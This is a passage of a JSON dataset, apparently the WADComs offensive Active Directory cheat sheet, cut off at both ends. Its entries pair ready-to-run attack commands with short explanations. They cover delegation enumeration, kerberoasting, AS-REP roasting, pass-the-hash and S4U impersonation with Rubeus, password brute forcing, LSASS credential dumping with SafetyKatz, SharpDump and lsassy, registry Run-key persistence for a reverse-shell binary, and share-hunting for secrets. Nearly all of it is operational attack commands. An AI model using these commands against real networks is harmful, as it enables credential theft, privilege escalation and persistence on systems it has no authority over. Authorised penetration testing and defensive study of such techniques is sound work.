$true} -Server $_ | select Name,DNSHostName; Get-ADUser -Filter {TrustedForDelegation -eq $true} -Server $_ | select Name,SamAccountName }\n\n\n# 2. Constrained (with protocol transition check)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter {msDS-AllowedToDelegateTo -like \"*\"} -Properties msDS-AllowedToDelegateTo,TrustedToAuthForDelegation -Server $_ | select Name,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo; Get-ADUser -Filter {msDS-AllowedToDelegateTo -like \"*\"} -Properties msDS-AllowedToDelegateTo,TrustedToAuthForDelegation -Server $_ | select Name,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo }\n\n# 3. RBCD (which object is already configured)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity -Server $_ | ? {$_.\"msDS-AllowedToActOnBehalfOfOtherIdentity\"} | select Name,DNSHostName }\n\n# 4. RBCD (which object can configure it - write access)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter * -Properties nTSecurityDescriptor -Server $_ | ? {$_.nTSecurityDescriptor.Access | ? {$_.ActiveDirectoryRights -match \"GenericWrite|WriteProperty\" -and $_.IdentityReference -notmatch \"SYSTEM|Domain Admins\"}} | select Name }","description":"Having imported the pwsh AD module referenced in the project, we can begin to use it to enumerate for potential points of exploit\none of the prime being kerberos delegation attacks. The following 4 line commands will enumerate the entire AD forest for RBCD, Constrained and Unconstrained delegation attacks.\nNote that we will also factor in protocol trainsiton as those change the attack vector slightly. See references below\n","mitre":[],"requires":["PowerShell"],"references":["https://redfoxsec.com/blog/attacking-kerberos-delegation/","https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://github.com/samratashok/ADModule"]},{"id":"wadcoms:PwshADmodule-Initial-Enum","toolId":"wadcoms:PwshADmodule","toolName":"PwshADmodule","name":"PwshADmodule-Initial-Enum","source":"WADComs","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"#Getting all DCs in the forest\n(Get-ADForest).Domains | % { Get-ADDomainController -DomainName $_ -Discover }\n\n#Getting all users in the forest\n(Get-ADForest).Domains | % { Get-ADUser -Filter * -Server $_ }\n\n#Getting all computers in the forest\n(Get-ADForest).Domains | % { Get-ADComputer -Filter * -Server $_ }\n\n#Mapping out entire trust relationships\nGet-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' | Select-Object Source,Target,Name\n\n#Getting all groups in a domain. Note that the select statement will limit the output to only the matching fields the object contains\nGet-ADGroup -Filter * | Select-Object SamAccountName, GroupScope, DistinguishedName","description":"These commands provide a quick refernece for using the AD module to get situational awerness of the AD environment.\nNote that to get more commands that you can run, use the get command cmdlet, e.g. `Get-Command -Module ActiveDirectory` But Thes\nare the standard commands that will get you standard. Feel free to replace the first pipe with the -server \"your domain\" if you dont want\nto enumarate the entire forest. For more info on using the AD module, please check out our discussion on the AD module in WADCOMs.\n","mitre":[],"references":["https://docs.microsoft.com/en-us/powershell/module/activedirectory/","https://github.com/samratashok/ADModule"]},{"id":"wadcoms:PyLDAPmonitor","toolId":"wadcoms:PyLDAPmonitor","toolName":"PyLDAPmonitor","name":"PyLDAPmonitor","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 ldapmonitor.py -u 'john' -d 'TEST.local' -p 'password123' --dc-ip 10.10.10.1","description":"ldapmonitor.py allows you to monitor creation, deletion and changes to LDAP objects live during your pentest.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username","Hash"],"services":["LDAP","Kerberos","NTLM"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/python"]},{"id":"wadcoms:PyWhisker","toolId":"wadcoms:PyWhisker","toolName":"PyWhisker","name":"PyWhisker","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 pywhisker.py -d \"test.local\" -u \"john\" -p \"password123\" --target \"user2\" --action \"list\" --dc-ip \"10.10.10.1\"","description":"pyWhisker is a tool allowing users to manipulate the msDS-KeyCredentialLink attribute of a target user/computer to obtain full control over that object. It's based on Impacket and on our Python equivalent of Michael Grafnetter's DSInternals called PyDSInternals. This tool, along with Dirk-jan's PKINITtools allow for a complete primitive exploitation on UNIX-based systems only.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos"],"references":["https://github.com/shutdownrepo/pywhisker"]},{"id":"wadcoms:RPCClient-Anonymous","toolId":"wadcoms:RPCClient","toolName":"RPCClient","name":"RPCClient-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"rpcclient -U '' -N 10.10.10.1","description":"rpcclient is a tool used for executing client side MS-RPC functions to manage Windows NT clients from Unix workstatios. From an offensive security standpoint, it can be used to enumerate users, groups, and other potentially sensitive information. The following command attempt to connect to the NetBIOS server anonymously, in order to enumerate using MS-RPC available commands/functions.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["RPC"],"references":["https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html","https://www.ired.team/offensive-security/enumeration-and-discovery/enumerating-windows-domains-using-rpcclient-through-socksproxy-bypassing-command-line-logging"]},{"id":"wadcoms:Regexe-Persistence","toolId":"wadcoms:Regexe","toolName":"Regexe","name":"Regexe-Persistence","source":"WADComs","platform":["Windows"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"reg.exe add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v Persistence /t REG_SZ /d \"C:\\Path\\To\\revshell.exe\"\n\nreg.exe add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v Persistence /t REG_SZ /d \"C:\\Path\\To\\revshell.exe\"","description":"It is possible to gain persistence on a windows machine by adding reg keys that will execute an arbitrary payload during logon or startup. Keys added to the HKLM hive will execute on startup. Keys added to the HKCU hive will execute when the corresponding user logs on. Adding keys into the HKLM hive will require an elevated shell. There are four keys that can be used: Run, RunOnce, RunServices, and RunServicesOnce. By default, a RunOnce key is deleted after the specified command is executed. The path for these keys is the same for the HKLM and HKCU hives.\n\nCommand Reference:\n\n\tValue Name: Persistence\n\n\tRegKey data type: REG_SZ\n\n\tData: \"C:\\Path\\To\\revshell.exe\"\n\n\tKeyName: \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\n","mitre":[],"requires":["Shell"],"references":["https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/","https://www.hackingarticles.in/windows-persistence-using-winlogon/","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg","https://docs.microsoft.com/en-us/windows-hardware/drivers/install/runonce-registry-key"]},{"id":"wadcoms:Responder-Analyze","toolId":"wadcoms:Responder","toolName":"Responder","name":"Responder-Analyze","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Responder -I eth0 -A","description":"Responder is an LLMNR, NBT-NS, and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool will only answer to File Server Service request, which is for SMB. The following command will put Responder in analyze mode, listening for NBT-NS, BROWSER, and LLMNR requests without responding.\n\nCommand Reference:\n\n\tInterface: eth0\n","mitre":[],"requires":["No_Creds"],"services":["NTLM","SMB"],"references":["https://github.com/lgandx/Responder","https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/"]},{"id":"wadcoms:Rubeus-ASREPRoast","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-ASREPRoast","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt","description":"Rubeus' `asreproast` module will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user's password, which can then be cracked offline. The following command is run on a Windows machine in the victim domain.\n\nCommand Reference:\n\n\tOutput File: hashes.txt\n","mitre":[],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#asreproast"]},{"id":"wadcoms:Rubeus-AskTGT","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-AskTGT","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Rubeus.exe asktgt /domain:test.local /user:john /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt","description":"Rubeus' `asktgt` module uses a valid user's NTLM hash to request Kerberos tickets, in order to access any service or machine where that user has permissions.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n","mitre":[],"requires":["Hash","Username"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#asktgt"]},{"id":"wadcoms:Rubeus-Brute","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Brute","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"Rubeus.exe /users:usernames.txt /passwords:passwords.txt /domain:test.local /outfile:found_passwords.txt","description":"Rubeus' `brute` module bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to brute force valid username and passwords logins given a list of usernames and a list of passwords.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n\n\tPassword List: passwords.txt\n\n\tOutput File: found_passwords.txt\n","mitre":[],"requires":["No_Creds"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#brute"]},{"id":"wadcoms:Rubeus-Kerberoast","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Kerberoast","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"Rubeus.exe kerberoast /outfile:hashes.txt","description":"Rubeus' `kerberoast` module will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account's password, which can then be bruteforced offline. The following command is run on a Windows machine in the victim domain.\n\nCommand Reference:\n\n\tOutput File: hashes.txt\n","mitre":[],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#kerberoast"]},{"id":"wadcoms:Rubeus-s4u","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-s4u","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution","Lateral Movement"],"nativeCategory":["Exploitation","Lateral Movement","Privilidge Escalation"],"command":"Rubeus.exe s4u /user:john$ /aes256:2a3de7fe356ee524cc9f3d579f2e0aa7 /impersonateuser:Administrator /msdsspn:time/dc.test.local /altservice:ldap /ptt","description":"Rubeus' `s4u` module performs Kerberos constrained delegation attacks using the S4U2Self and S4U2Proxy. This technique abuses accounts configured with delegation privileges (msDS-AllowedToDelegateTo) to impersonate any domain user and further alter the service specified since SPNs are stored in plaintext and thus access any service on the target system as any user\n\nCommand Reference:\n\n\tDomain: test.local\n\n SPN: time/dc.test.local\n\n alternative service: ldap(can chose any valid services such as HTTP for remoting access)\n\n\tUsername: john$\n\n\tHash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n","mitre":[],"requires":["Hash","Username","target","service"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/steal-or-forge-kerberos-tickets/constrained-delegation","https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation"]},{"id":"wadcoms:SMBClient-Enum-Share-Anonymous","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-Enum-Share-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"smbclient \\\\\\\\test.local\\\\public -I 10.10.10.1 -N","description":"Smbclient is a tool used to communicate with SMB servers. The following command will connect to an SMB share `public` using anonymous login.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tSMB Share: public\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html","https://www.madirish.net/59"]},{"id":"wadcoms:SMBClient-Enum-Share","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-Enum-Share","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"smbclient \\\\\\\\test.local\\\\C$ -I 10.10.10.1 -U john password123","description":"Smbclient is a tool used to communicate with SMB servers. The following command will connect to an SMB share `C$` using valid credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tSMB Share: C$\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html","https://www.madirish.net/59"]},{"id":"wadcoms:SMBClient-List-Share-PTH","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-List-Share-PTH","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"smbclient -L \\\\10.10.10.1 -U test.local/john --pw-nt-hash XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","description":"Smbclient is a tool used to communicate with SMB servers. The following command will list out all available shares on the target ip using user John hash on test domain.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n","mitre":[],"requires":["Username","Hash"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html"]},{"id":"wadcoms:SMBClient-List-Shares-Anonymous","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-List-Shares-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"smbclient -L \\\\test.local -I 10.10.10.1 -N","description":"Smbclient is a tool used to communicate with SMB servers. The following command will list out all available shares on the target server using anonymous login.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html"]},{"id":"wadcoms:SMBClient-List-Shares","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-List-Shares","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"smbclient -L \\\\test.local -I 10.10.10.1 -U john password123","description":"Smbclient is a tool used to communicate with SMB servers. The following command will list out all available shares on the target server using valid credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html"]},{"id":"wadcoms:SMBMap-Enum-File","toolId":"wadcoms:SMBMap","toolName":"SMBMap","name":"SMBMap-Enum-File","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 smbmap.py --host-file smb-hosts.txt -u john -p 'password123' -d test.local -F password","description":"SMBMap is a tool used to enumerate SMB share drives, including listing share drive permissions, share contents, upload/download functionality, file name enumeration, and remote command execution. The following command will enumerate a list of SMB hosts for files and filenames containing the keyword 'password'.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tSMB Hosts: smb-hosts.txt\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"]},{"id":"wadcoms:SMBMap-Enum-Share-Anonymous","toolId":"wadcoms:SMBMap","toolName":"SMBMap","name":"SMBMap-Enum-Share-Anonymous","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 smbmap.py --host-file smb-hosts.txt -d test.local -L","description":"SMBMap is a tool used to enumerate SMB share drives, including listing share drive permissions, share contents, upload/download functionality, file name enumeration, and remote command execution. The following command will enumerate a list of SMB hosts for accessible SMB shares, both local and mapped drives, without credentials (null session).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tSMB Hosts: smb-hosts.txt\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"]},{"id":"wadcoms:SMBMap-Enum-Share","toolId":"wadcoms:SMBMap","toolName":"SMBMap","name":"SMBMap-Enum-Share","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 smbmap.py --host-file smb-hosts.txt -u john -p 'password123' -d test.local -L","description":"SMBMap is a tool used to enumerate SMB share drives, including listing share drive permissions, share contents, upload/download functionality, file name enumeration, and remote command execution. The following command will enumerate a list of SMB hosts for accessible SMB shares, both local and mapped drives, using valid credentials.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tSMB Hosts: smb-hosts.txt\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"]},{"id":"wadcoms:SafetyKatz","toolId":"wadcoms:SafetyKatz","toolName":"SafetyKatz","name":"SafetyKatz","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Discovery"],"nativeCategory":["PrivEsc","Enumeration"],"command":"safetykatz.exe \"privilege::debug\" \"sekurlsa::evasive-logonpasswords\" \"exit\"","description":"SafetyKatz.exe is part of the GhostPack suite of tools and is a combination of SharpDump and Mimikatz. The following command will dump the LSASS process and run Mimikatz to extract credentials from the dumped process. Safetykatz also supports a number of mimikatz native commands such as \"sekurlsa::evasive-keys\" etc. The evasive switch in lab and production enviroments up to windows 2016 has been noted to successfully run where the non \"evasive\" switches had not\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/SafetyKatz","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:Seatbelt","toolId":"wadcoms:Seatbelt","toolName":"Seatbelt","name":"Seatbelt","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"Seatbelt.exe -group=all -full > output.txt","description":"Seatbelt.exe is part of the GhostPack suite of tools that will perform a lot of \"safety checks\" on the Windows host and collect system data that could be useful for potential privilege escalation or persistence methods. The following command will run all checks on the system and store the output in a file (WARNING: will collect a lot of data. remove `-full` for less output).\n\nCommand Reference:\n\n\tRun all checks: -group=all\n\n\tOutput File: output.txt\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/Seatbelt","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:SharpDump","toolId":"wadcoms:SharpDump","toolName":"SharpDump","name":"SharpDump","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Discovery"],"nativeCategory":["PrivEsc","Enumeration"],"command":"SharpDump.exe","description":"SharpDump.exe is part of the GhostPack suite of tools and is a C# port of PowerSploit's Out-Minidump.ps1. It can dump the process for LSASS or a specific process given it's PID. This dump can then be fed into mimikatz to extract sensitive information. The following command simply dumps the LSASS process.\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/SharpDump","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:SharpHound-LDAP","toolId":"wadcoms:SharpHound","toolName":"SharpHound","name":"SharpHound-LDAP","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Discovery"],"nativeCategory":["PrivEsc","Enumeration"],"command":"SharpHound.exe --CollectionMethods All --LdapUsername john --LdapPassword password123 --ZipFileName output.zip","description":"SharpHound.exe is the official data collector for BloodHound, written in C# and uses Windows API functions and LDAP namespace functions to collect data from domain controllers and domain-joined Windows systems. This data can then be fed into BloodHound to enumerate potential paths of privilege escalation. The following command peforms all collection methods and will use the provided LDAP credentials when performing LDAP collection methods, and stores the output in a zip file that can be directly placed in the BloodHound GUI.\n\nCommand Reference:\n\n\tLDAP Username: john\n\n\tLDAP Password: password123\n\n\tOutput File: output.zip\n","mitre":[],"requires":["Shell","Username","Password"],"services":["LDAP"],"references":["https://github.com/BloodHoundAD/SharpHound3","https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html"]},{"id":"wadcoms:SharpHound","toolId":"wadcoms:SharpHound","toolName":"SharpHound","name":"SharpHound","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Discovery"],"nativeCategory":["PrivEsc","Enumeration"],"command":"SharpHound.exe --CollectionMethods All --ZipFileName output.zip\n#Using PowerShell module\npowershell -ep bypass \n.\\SharpHound.ps1\nInvoke-BloodHound -CollectionMethod All -Domain domain.tld -ZipFileName output.zip","description":"SharpHound.exe and SharpHound.ps1 are the official data collector for BloodHound, written in C# or Powershell and uses Windows API functions and LDAP namespace functions to collect data from domain controllers and domain-joined Windows systems. This data can then be fed into BloodHound to enumerate potential paths of privilege escalation. The following command peforms all collection methods and stores the output in a zip file that can be directly placed in the BloodHound GUI.\n\nCommand Reference:\n\n\tOutput File: output.zip\n","mitre":[],"requires":["Shell"],"references":["https://github.com/BloodHoundAD/SharpHound3","https://bloodhound.specterops.io/collect-data/ce-collection/sharphound","https://github.com/ZishanAdThandar/pentest/blob/main/notes/ActiveDirectory.md#bloodhound"]},{"id":"wadcoms:SharpLDAPmonitor","toolId":"wadcoms:SharpLDAPmonitor","toolName":"SharpLDAPmonitor","name":"SharpLDAPmonitor","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"SharpLDAPmonitor.exe /dcip:10.10.10.1 /user:TEST.local\\john /pass:password123","description":"SharpLDAPmonitor.exe allows you to monitor creation, deletion and changes to LDAP objects live during your pentest.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["LDAP","Kerberos","NTLM"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/csharp"]},{"id":"wadcoms:SharpUp","toolId":"wadcoms:SharpUp","toolName":"SharpUp","name":"SharpUp","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation"],"nativeCategory":["PrivEsc"],"command":"SharpUp.exe > output.txt","description":"SharpUp.exe is part of the GhostPack suite of tools and is a C# port of PowerUp that will perform numerous privilege escalation checks. The following command will run all priv esc checks and store the output in a file.\n\nCommand Reference:\n\n\tOutput File: output.txt\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/SharpUp","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:SharpWMI","toolId":"wadcoms:SharpWMI","toolName":"SharpWMI","name":"SharpWMI","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"SharpWMI.exe action=query query=\"select * from win32_process\"","description":"SharpWMI.exe is part of the GhostPack suite of tools that provides WMI functionality, such as local/remote WMI queries, remote WMI process creation, and remote execution of arbitrary VBS through WMI events. The following command will simply list all processes running on the local system.\n\nCommand Reference:\n\n\tGet all processes: \"select * from win32_process\"\n","mitre":[],"requires":["Shell"],"services":["WMI"],"references":["https://github.com/GhostPack/SharpWMI","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:Snaffler","toolId":"wadcoms:Snaffler","toolName":"Snaffler","name":"Snaffler","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"Snaffler.exe -s -o snaffler_output.log -d test.local -c 10.10.10.1","description":"Snaffler is a tool used to enumerate sensitive data (passwords, PII, etc.) from file shares in Active Directory. It searches for interesting files based on file extensions, file names, and file content that's matched against regex. It's also highly configurable, allowing you to add your own regex searches. The following command will enumerate all machines in the domain and search for accessible file shares, checking for interesting files that might have sensitive data.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDomain Controller: 10.10.10.1\n","mitre":[],"requires":["Shell"],"services":["SMB"],"references":["https://github.com/SnaffCon/Snaffler"]},{"id":"wadcoms:Windapsearch","toolId":"wadcoms:Windapsearch","toolName":"Windapsearch","name":"Windapsearch","source":"WADComs","platform":["Linux","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 windapsearch --dc-ip 10.10.10.1 -u test.local\\\\john -p password123 -U -G --da -m \"Remote Desktop Users\" -C -r","description":"windapsearch enumerates users, groups, and computers from a Windows domain through LDAP queries. The following command enumerates all 3 of the above mentioned using provided credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tEnum Users: -U\n\n\tEnum Groups: -G\n\n\tEnum Domain Admins: --da\n\n\tEnum members of group: -m \"Remote Desktop Users\"\n\n\tEnum Computers and resolve DNS: -C -r\n","mitre":[],"requires":["Username","Password"],"references":["https://github.com/ropnop/windapsearch","https://www.attackdebris.com/?p=470"]},{"id":"wadcoms:bloodyAD-Wite-Properties","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-Wite-Properties","source":"WADComs","platform":["Linux"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"bloodyAD --host 10.10.10.1 -d test.local -u john -p password123 -d test.local get writable --detail","description":"BloodyAD can be used to set, write and delete properties of objects in AD. Given a user:pass, you can use bloodyAD to which objects and what properties of\nthose objects are writeable to the user:pass given. Thus if you use -u john -p john, this command will show you what objects and properties\ncan john write to\n\nCommand Reference:\n Target IP: 10.10.10.1\n\n\tDomain: test.local\n\n Username: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"references":["https://github.com/CravateRouge/bloodyAD","https://adminions.ca/books/active-directory-enumeration-and-exploitation/page/bloodyad"]},{"id":"wadcoms:enum4linux-ng","toolId":"wadcoms:Enum4Linux","toolName":"Enum4Linux","name":"enum4linux-ng","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"enum4linux-ng 10.10.10.1","description":"enum4linux-ng is a modern reimplementation of enum4linux written in Python3. It is used to enumerate information from Windows and Samba systems, providing cleaner output and better support for modern protocols. The following command performs a full unauthenticated enumeration of the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/cddmp/enum4linux-ng"]},{"id":"wadcoms:lsassy-credsdump","toolId":"wadcoms:lsassy","toolName":"lsassy","name":"lsassy-credsdump","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"lsassy -u john -p password123 -d test.local 10.10.10.1","description":"\"lsassy is a tool written in python released in 2021 to provide a varity of methods to dump credintials from a single/multiple remote targets. It uses a varity of differnt tactics that provide OPSEC benefits in some cases while also providing the operator options in how it executes remotely, which method it uses as well as the ability to replace the inbuild binaries with your own very easily. Note that if you had introduced nxc into the enviroment previously, then youre encouraged for OSPEC gains to use the built in lsass module. This holds true for many sources in this project that if you had introduced x y z tool; you are better off continuing to use those instead of constantly introducing new ones\"\n\nCommand reference:\n Password: password123\n Username: john\n Domain: test.local\n Target: 10.10.10.1\n","mitre":[],"requires":["Username","Password"],"services":["Kerberos","NTLM"],"references":["https://en.hackndo.com/remote-lsass-dump-passwords/","https://github.com/login-securite/lsassy?tab=readme-ov-file"]},{"id":"wadcoms:targetedKerberoast","toolId":"wadcoms:targetedKerberoast","toolName":"targetedKerberoast","name":"targetedKerberoast","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 targetedKerberoast.py -d test.local -u john -p password123 --dc-ip 10.10.10.1","description":"targetedKerberoast is a Python script that can, like many others (e.g. GetUserSPNs.py), print \"kerberoast\" hashes for user accounts that have a SPN set. This tool brings the following additional feature: for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), print the \"kerberoast\" hash, and delete the temporary SPN set for that operation.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: 